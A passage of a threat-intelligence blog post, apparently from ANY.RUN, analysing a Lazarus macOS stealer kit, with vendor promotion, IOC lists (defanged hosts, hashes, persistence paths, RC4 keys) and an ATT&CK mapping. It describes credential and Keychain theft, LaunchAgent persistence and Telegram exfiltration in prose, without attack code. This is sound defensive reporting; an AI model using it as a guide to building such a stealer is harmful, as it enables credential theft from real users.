<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="650" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/K-1-1024x650.png" alt="" class="wp-image-20222" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/K-1-1024x650.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/K-1-300x191.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/K-1-768x488.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/K-1-1536x975.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/K-1-2048x1301.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/K-1-370x235.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/K-1-270x171.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/K-1-740x470.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The&nbsp;LaunchAgent</em>&nbsp;</figcaption></figure></div>


<p>Moving on to the final stage, this script cleans up by&nbsp;deleting&nbsp;all ZIP files and downloaded fake applications (*.app) from the temporary directory. The parent process then&nbsp;proceeds&nbsp;to download the final binary in the kit: macrasv2.&nbsp;</p>



<h2 class="wp-block-heading">The Stealer&nbsp;</h2>



<p>Obtained from the same /payload endpoint, macrasv2 is the final stealer and the main&nbsp;component&nbsp;of the chain.&nbsp;&nbsp;</p>



<p><a href="https://app.any.run/tasks/94b9bc1f-86ff-4069-8222-1cb511d78ad9/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">See sandbox analysis of macrasv2</a>&nbsp;</p>



<p>It stages all previously collected data, including, but not limited to, browser extension data, stored browser&nbsp;credentials&nbsp;and cookies (typically kept in SQLite databases), macOS Keychain entries, and other files of interest,&nbsp;consolidating&nbsp;them into a temporary directory. Since this is an empty laboratory, the number of staged files is&nbsp;relatively small.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="619" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/L-1-1024x619.png" alt="" class="wp-image-20224" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/L-1-1024x619.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/L-1-300x181.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/L-1-768x464.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/L-1-1536x929.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/L-1-2048x1238.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/L-1-370x224.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/L-1-270x163.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/L-1-740x447.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Final staging directory</em>&nbsp;</figcaption></figure></div>


<p>From there, the data is archived into a file named user_ext.zip, preparing it for exfiltration.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="616" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/M-1-1024x616.png" alt="" class="wp-image-20226" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/M-1-1024x616.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/M-1-300x181.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/M-1-768x462.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/M-1-1536x924.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/M-1-2048x1232.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/M-1-370x223.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/M-1-270x162.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/M-1-740x445.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ZIP file ready to be exfiltrated</em>&nbsp;</figcaption></figure></div>


<p>Exfiltration is carried out through a familiar channel, Telegram. In this case, however, the operators exposed their bot token, effectively allowing third parties to interact with the bot. This not only weakens their operational security but also simplifies reporting and potential takedown efforts.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="618" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/N-1-1024x618.png" alt="" class="wp-image-20228" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/N-1-1024x618.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/N-1-300x181.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/N-1-768x464.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/N-1-1536x928.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/N-1-2048x1237.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/N-1-370x223.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/N-1-270x163.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/N-1-740x447.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Telegram Bot/API Key is leaked</em></figcaption></figure></div>


<p>This makes it trivial to both read the bot’s messages, send messages on its behalf, and even&nbsp;identify&nbsp;its owner.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="805" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Z-1-1024x805.png" alt="" class="wp-image-20232" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Z-1-1024x805.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Z-1-300x236.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Z-1-768x604.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Z-1-1536x1207.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Z-1-2048x1610.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Z-1-370x291.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Z-1-270x212.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Z-1-740x582.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Operator&nbsp;identified&nbsp;via leaked Bot Key</em>&nbsp;</figcaption></figure></div>


<p>Finally, the malware invokes a self-deletion script named delete_self.sh, which simply removes itself and other components using the system’s rm command.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="618" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/O-1-1024x618.png" alt="" class="wp-image-20234" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/O-1-1024x618.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/O-1-300x181.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/O-1-768x464.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/O-1-1536x928.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/O-1-2048x1237.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/O-1-370x223.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/O-1-270x163.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/O-1-740x447.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Self-deletion routine</em>&nbsp;</figcaption></figure></div>


<p>With this, the full infection cycle is complete. Thanks to ANY.RUN’s macOS analysis capabilities, we were able to fully reconstruct it in record time. It is worth noting that this is a novel (previously unseen) malware, which would typically require significantly more time to disassemble and analyze using traditional methods.&nbsp;</p>



<p>Let’s&nbsp;now move on to the ATT&amp;CK Matrix, followed by the IOCs and other interesting details.&nbsp;</p>



<h2 class="wp-block-heading">Additional Observations&nbsp;</h2>



<ul class="wp-block-list">
<li>The malware is badly written, with certain components entering infinite loops that may expose its presence due to system resource starvation.&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Operational security weaknesses were&nbsp;identified, such as exposed Telegram bot tokens and C2 endpoints with missing authentication.&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>The use of ad-hoc code signing&nbsp;indicates&nbsp;an attempt to bypass macOS execution controls without valid developer credentials.&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Network traffic analysis shows that the malware primarily communicates over ports 8888 and 9999. Additionally, HTTP requests consistently use a User-Agent string associated with the Go programming language (e.g., Go-http-client), which aligns with other observed components of the toolset.&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>The&nbsp;adversary’s&nbsp;infrastructure exposed multiple services, including&nbsp;WinRM, Chrome Remote Desktop, Remote Desktop Protocol (RDP), and a replica of the C2 server running on port 110.&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Reverse engineering analysis&nbsp;indicates&nbsp;that multiple components of the malware are written in Go. This is supported by the presence of Go-specific strings and referenced artifacts within the binaries, including characteristic function naming conventions, runtime structures, and the use of the standard Go HTTP client in network communications.&nbsp;&nbsp;</li>
</ul>



<h2 class="wp-block-heading">Defending Against Lazarus Attacks:&nbsp;How&nbsp;CISOs&nbsp;Can Minimize Risk&nbsp;</h2>



<p>Trust-abuse phishing, exemplified by campaigns like&nbsp;<strong>Mach-O Man</strong>, exploits legitimate platforms to bypass conventional security measures. Attackers manipulate human psychology with urgent meeting requests or fake technical issues, tricking users into executing malicious commands or&nbsp;disclosing&nbsp;credentials.&nbsp;&nbsp;</p>



<p>For SOC teams, the difficulty lies in detecting these attacks early, as they often slip past signature-based defenses by&nbsp;leveraging&nbsp;trusted services and user-driven actions.&nbsp;</p>



<h3 class="wp-block-heading">Close Detection Gaps with&nbsp;Stronger&nbsp;Cross-Platform&nbsp;Triage&nbsp;</h3>



<p>To combat these threats, SOCs must adopt&nbsp;<strong>interactive sandboxing</strong>&nbsp;as a cornerstone of their triage process. Unlike automated solutions,&nbsp;<a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener"><strong>ANY.RUN</strong></a><strong>&nbsp;eliminates&nbsp;critical&nbsp;blind spots&nbsp;for security teams&nbsp;</strong>by enabling analysis of malicious files and URLs across&nbsp;<strong>Windows, macOS, Linux, and Android</strong>&nbsp;in a single interface.&nbsp;&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="643" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/frame_generic_light-3-2-1024x643.png" alt="" class="wp-image-20267" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/frame_generic_light-3-2-1024x643.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/frame_generic_light-3-2-300x188.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/frame_generic_light-3-2-768x482.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/frame_generic_light-3-2-1536x964.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/frame_generic_light-3-2-370x232.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/frame_generic_light-3-2-270x170.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/frame_generic_light-3-2-740x465.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/frame_generic_light-3-2.png 1943w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN’s sandbox delivers fast verdicts on malicious files and URLs</em></figcaption></figure></div>


<p>Instead of juggling separate solutions for each OS, SOC teams gain a&nbsp;<strong>unified sandbox environment</strong>&nbsp;where they can manually simulate user interactions, uncover hidden attack stages, and capture behavioral IOCs,&nbsp;such as unusual&nbsp;sysctl&nbsp;queries in macOS or Mach-O binary execution.&nbsp;&nbsp;</p>



<p>For business processes, this means&nbsp;<strong>streamlined triage,&nbsp;</strong>reducing analysis&nbsp;time&nbsp;and&nbsp;<a href="https://any.run/integrations/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktointegrations" target="_blank" rel="noreferrer noopener">integrating seamlessly</a>&nbsp;with SIEM/SOAR for automated threat&nbsp;investigations.&nbsp;&nbsp;</p>



<p>ANY.RUN delivers&nbsp;<strong>full attack context</strong>&nbsp;(process chains, network connections, system changes), which&nbsp;is especially critical for companies with&nbsp;<strong>hybrid infrastructures</strong>&nbsp;(corporate Windows, macOS for developers/designers, Linux servers, and employee Android devices), where traditional sandboxes cover only part of the risk.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Reduce MTTR by 21 minutes in your SOC. </span><br>Upgrade Tier 1 productivity with ANY.RUN.&nbsp;   
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/features/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=lazarus-apt-macos-campaign&#038;utm_term=210426&#038;utm_content=linktosandboxlanding#contact-sales" rel="noopener" target="_blank">
Contact us
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p>When integrated into your SOC workflows, ANY.RUN’s Sandbox delivers measurable impact, enabling security teams to:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Identify&nbsp;Credential Exposure Earlier:</strong>&nbsp;Detect threats in under 60 seconds and reduce breach probability before escalation begins&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Reduce MTTR:</strong>&nbsp;Achieve up to 21 minutes faster response time and 50% quicker IOC extraction&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Detect More Relevant Threats:</strong>&nbsp;Identify&nbsp;up to 58% more threats with real-time, sandbox-verified intelligence&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Minimize High-Severity Incidents:</strong>&nbsp;Earlier detection lowers escalation rates and limits impact on business operations&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Improve SOC Efficiency Without Hiring:</strong>&nbsp;Increase team performance up to 3x and reduce Tier 1 workload by 20%&nbsp;</li>
</ul>



<p>&nbsp;<br>For businesses, this means&nbsp;<strong>fewer breaches, lower&nbsp;financial impact&nbsp;per incident, and more predictable security outcomes</strong>. Organizations gain control over both&nbsp;risk&nbsp;exposure and operational costs, rather than reacting after damage occurs.&nbsp;</p>



<h2 class="wp-block-heading">About ANY.RUN&nbsp;</h2>



<p><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>&nbsp;helps&nbsp;over 15,000&nbsp;organizations&nbsp;and 600,000 security professionals&nbsp;identify&nbsp;and understand threats before they turn into incidents.&nbsp;</p>



<p>The solutions combine&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">interactive sandbox</a>&nbsp;analysis and real-time&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktolookuplanding" target="_blank" rel="noreferrer noopener">threat intelligence</a>&nbsp;into a single workflow, allowing SOC teams to analyze files and URLs,&nbsp;observe&nbsp;full attack behavior, and make faster, more&nbsp;accurate&nbsp;decisions. Instead of relying on delayed indicators or assumptions, analysts see what the threat&nbsp;actually does&nbsp;and what risk it creates for the business.&nbsp;</p>



<p>By strengthening monitoring, triage, and response, ANY.RUN enables organizations to detect more threats earlier, reduce response time, and limit the impact of credential theft, data exposure, and account compromise.&nbsp;</p>



<p>The result is a more predictable and efficient SOC, where decisions are made faster, incidents are&nbsp;contained&nbsp;earlier, and business risk is reduced.&nbsp;</p>



<h2 class="wp-block-heading">IOCs and TTPs&nbsp;</h2>



<h3 class="wp-block-heading">Network IOCs&nbsp;</h3>



<p><strong>IP Addresses</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>172[.]86[.]113[.]102&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>144[.]172[.]114[.]220&nbsp;&nbsp;</li>
</ul>



<p><strong>Domains</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>update-teams[.]live&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>livemicrosft[.]com&nbsp;&nbsp;</li>
</ul>



<p><strong>URLs</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>h[tt]p://172[.]86[.]113[.]102/Onedrive&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>h[tt]ps://update-teams[.]live/teams&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>h[tt]p://172[.]86[.]113[.]102/localencode&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>livemicrosft[.]com/meet/89035563931?p=9jXK14VFM8fObdKxfkake8tD7rPhzs.1&nbsp;&nbsp;</li>
</ul>



<h3 class="wp-block-heading">File-based IOCs&nbsp;</h3>



<p><strong>File Names</strong>&nbsp;</p>



<div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-grid wp-container-core-group-is-layout-3 wp-block-group-is-layout-grid">
<ul class="wp-block-list">
<li>localencode&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>OneDrive&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>teamsSDK.bin&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>D1YrHRTg.bin&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>D1yCPUyk.bin&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>minst2.bin&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>macrasv2&nbsp;&nbsp;</li>
</ul>
</div></div>



<p><strong>File Paths</strong>&nbsp;</p>



<div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-grid wp-container-core-group-is-layout-4 wp-block-group-is-layout-grid">
<ul class="wp-block-list">
<li>/Users/$USER/.local/bin/OneDrive&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>~/Library/.initialized&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>~/Library/LaunchAgents/com.onedrive.launcher.plist&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>~/Library/LaunchAgents/com.onedrive.launcher.tmp&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>$TMPDIR/OneDrive&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>$TMPDIR/geniex_client_sleep_state&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>bin.config&nbsp;&nbsp;</li>
</ul>
</div></div>



<p><strong>File Hashes (SHA256)</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>eb3eae776d175f7fb2fb9986c89154102ba8eabfde10a155af4dfb18f28be1b5 (com.onedrive.launcher.plist)&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>eb3eae776d175f7fb2fb9986c89154102ba8eabfde10a155af4dfb18f28be1b5 (com.onedrive.launcher.tmp)&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90 (D1yCPUyk.bin)&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90 (D1YrHRTg.bin)&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>a9562ab6bce06e92d4e428088eacc1e990e67ceae6f6940047360261b5599614 (localencode&nbsp;/ OneDrive)&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>85bed283ba95d40d99e79437e6a3161336c94ec0acbc0cd38599d0fc9b2e393c (macrasv2)&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>cc31b3dc8aeed0af9dd24b7e739f183527d55d5b5ecd3d93ba45dd4aaa8ba260 (MauroDPRKSamples.zip)&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>4b08a9e221a20b8024cf778d113732b3e12d363250231e78bae13b1f1dc1495b (minst2.bin)&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>89616a503ffee8fc70f13c82c4a5e4fa4efafa61410971f4327ed38328af2938 (SystemApp.zip)&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>dfee6ea9cafc674b93a8460b9e6beea7f0eb0c28e28d1190309347fd1514dbb6 (TeamsApp.zip)&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>871d8f92b008a75607c9f1feb4922b9a02ac7bd2ed61b71ca752a5bed5448bf3 (teamsSDK.bin)&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9 (ZoomApp.zip)&nbsp;&nbsp;</li>
</ul>



<h3 class="wp-block-heading">Host-based IOCs&nbsp;</h3>



<p><strong>Persistence Artifacts</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>~/Library/LaunchAgents/com.onedrive.launcher.plist&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>~/Library/LaunchAgents/com.onedrive.launcher.tmp&nbsp;&nbsp;</li>
</ul>



<p><strong>Suspicious Directories / Files</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>~/Library/.initialized&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>/Users/$USER/.local/bin/OneDrive&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>$TMPDIR/geniex_client_sleep_state&nbsp;&nbsp;</li>
</ul>



<h3 class="wp-block-heading">Code / Binary Artifacts&nbsp;</h3>



<p><strong>Strings</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>geniex-client/core&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>geniex-client/protocol&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>geniex-client/Internal/vss&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>geniex_client_sleep_state&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>geniex&nbsp;config file too short&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>com.onedrive.launcher&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Die command received,&nbsp;initiating&nbsp;self-destruction&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hobocopy_%d&nbsp;&nbsp;</li>
</ul>



<p><strong>Build Artifact</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>GoBuildID:&nbsp;<br>XSnX8a5Y1OweX0Ob6lfO/ZYlrxu-H_BNvt5ptXb3c/8HR_X2LwoFzXXN4Fti_K/xaM13na_g6snvgcy0x9t&nbsp;&nbsp;</li>
</ul>



<p><strong>Encryption Keys</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>RC4Key:&nbsp;<br>a73ce18952b40fd621789e43c56b2af08d1497ce3560b2481fa973d8265ce491&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>RC4Key:&nbsp;<br>5476bbf8ddb2fb056295f09ebe05e20a7d1cf29ea279cd4613c87544013e080fef35c97b3511ef9c0f12e505a1d805628ba10483dc9290508f94d153ee94d5c4&nbsp;</li>
</ul>



<h3 class="wp-block-heading">ATT&amp;CK Matrix&nbsp;</h3>



<p><strong>Execution&nbsp;</strong></p>



<ul class="wp-block-list">
<li>User Execution (T1204)&nbsp;&nbsp;</li>
</ul>



<p><strong>Persistence&nbsp;</strong></p>



<ul class="wp-block-list">
<li>Create or Modify System Process: Launch Agent (T1543.001)&nbsp;&nbsp;</li>
</ul>



<p><strong>Privilege Escalation&nbsp;</strong></p>



<ul class="wp-block-list">
<li>Abuse Elevation Control Mechanism: Sudo and Sudo Caching (T1548.003)&nbsp;&nbsp;</li>
</ul>



<p><strong>Defense Evasion&nbsp;</strong></p>



<ul class="wp-block-list">
<li>File and Directory Permissions Modification (T1222)&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Virtualization/Sandbox Evasion (T1497)&nbsp;&nbsp;</li>
</ul>



<p><strong>Credential Access</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>Credentials from Password Stores (T1555)&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Unsecured Credentials (T1552)&nbsp;&nbsp;</li>
</ul>



<p><strong>Discovery &amp; Collection&nbsp;</strong></p>



<ul class="wp-block-list">
<li>System Information Discovery (T1082)&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Process Discovery (T1057)&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>System Time Discovery (T1124)&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>File and Directory Discovery (T1083)&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Data from Local System (T1005)&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Archive Collected Data (T1560)&nbsp;&nbsp;</li>
</ul>



<p><strong>Exfiltration&nbsp;</strong></p>



<ul class="wp-block-list">
<li>Exfiltration Over Web Service: Exfiltration to Cloud Storage / Web Service (T1567)&nbsp;&nbsp;</li>
</ul>



<p>Data is exfiltrated via Telegram bot API, using a legitimate web service to evade detection.&nbsp;</p>



<h3 class="wp-block-heading">References&nbsp;</h3>



<p>Original Quetzal Team Article:&nbsp;<a href="https://open.substack.com/pub/quetzalteam/p/north-koreas-safari-hunting-for-rats" target="_blank" rel="noreferrer noopener">https://open.substack.com/pub/quetzalteam/p/north-koreas-safari-hunting-for-rats</a>&nbsp;&nbsp;</p>



<p>Original LevelBlue Labs Intelligence Pulse: <a href="https://otx.alienvault.com/pulse/69d9c62d24ae9bc8d5653f56" target="_blank" rel="noreferrer noopener nofollow">https://otx.alienvault.com/pulse/69d9c62d24ae9bc8d5653f56</a>  </p>



<p>Session 1:&nbsp;<a href="https://app.any.run/tasks/937afde2-5e3c-4eb0-a7d1-6124f0f3ed18" target="_blank" rel="noreferrer noopener">https://app.any.run/tasks/937afde2-5e3c-4eb0-a7d1-6124f0f3ed18</a>&nbsp;</p>



<p>Session 2:&nbsp;<a href="https://app.any.run/tasks/777b23e8-25ea-45b5-a998-d2e1c400c9d1" target="_blank" rel="noreferrer noopener">https://app.any.run/tasks/777b23e8-25ea-45b5-a998-d2e1c400c9d1</a>&nbsp;</p>



<p>Session 3:&nbsp;<a href="https://app.any.run/tasks/7f771a62-fcda-4a33-8e99-ab068fae8500" target="_blank" rel="noreferrer noopener">https://app.any.run/tasks/7f771a62-fcda-4a33-8e99-ab068fae8500</a>&nbsp;</p>



<p>Session 4: <a href="https://app.any.run/tasks/94b9bc1f-86ff-4069-8222-1cb511d78ad9" target="_blank" rel="noreferrer noopener">https://app.any.run/tasks/94b9bc1f-86ff-4069-8222-1cb511d78ad9</a></p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/">New Lazarus APT Campaign: “Mach-O Man” macOS Malware Kit Hits Businesses</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>BlobPhish: The Phantom Phishing Campaign Hiding in Browser Memory</title>
		<link>https://any.run/cybersecurity-blog/evasive-blob-phishing-detection/</link>
					<comments>https://any.run/cybersecurity-blog/evasive-blob-phishing-detection/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Thu, 16 Apr 2026 10:55:44 +0000</pubDate>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[ANYRUN]]></category>
